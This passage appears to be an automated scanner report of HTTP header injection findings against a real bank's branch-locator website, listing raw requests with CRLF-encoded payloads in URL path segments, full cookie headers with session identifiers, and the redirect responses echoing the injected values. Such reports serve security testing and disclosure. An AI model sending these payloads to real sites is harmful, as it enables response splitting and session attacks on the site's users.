cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:29 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=2AAD889214B6166711A9FABFF2AD0B19.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/165f1 bca7c7ee0df/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 1e5f6%0d%0a0b02131700 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/1e5f6%0d%0a0b02131700/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:01 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=70622B31FB5FFD15BE76423927D158C8.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/1e5f6 0b02131700/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 9fad7%0d%0a56cf2f28cc3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/9fad7%0d%0a56cf2f28cc3=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:06 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=D8319DF6373561B7457D3A28479765A7.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/9fad7 56cf2f28cc3=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload b554f%0d%0a69065a9ac35 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/b554f%0d%0a69065a9ac35/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:52 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=13D0799B37B1A6330788214B8491765E.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/b554f 69065a9ac35/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 210bb%0d%0af3373810809 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/210bb%0d%0af3373810809/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:20 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=10E64423BDF4B84384C37B30DC0983BD.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/210bb f3373810809/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 1d3b6%0d%0a8b2a3b90a87 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/1d3b6%0d%0a8b2a3b90a87/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:03 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=57F85E55110E992991B97D0DF915468A.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/1d3b6 8b2a3b90a87/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload f93a4%0d%0a63ee792b791 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/f93a4%0d%0a63ee792b791/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:46:24 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=875EA90A4C8077CE82577916B6D7E7CA.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/f93a4 63ee792b791/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload e52af%0d%0af9ec1ac6f45 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/e52af%0d%0af9ec1ac6f45=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
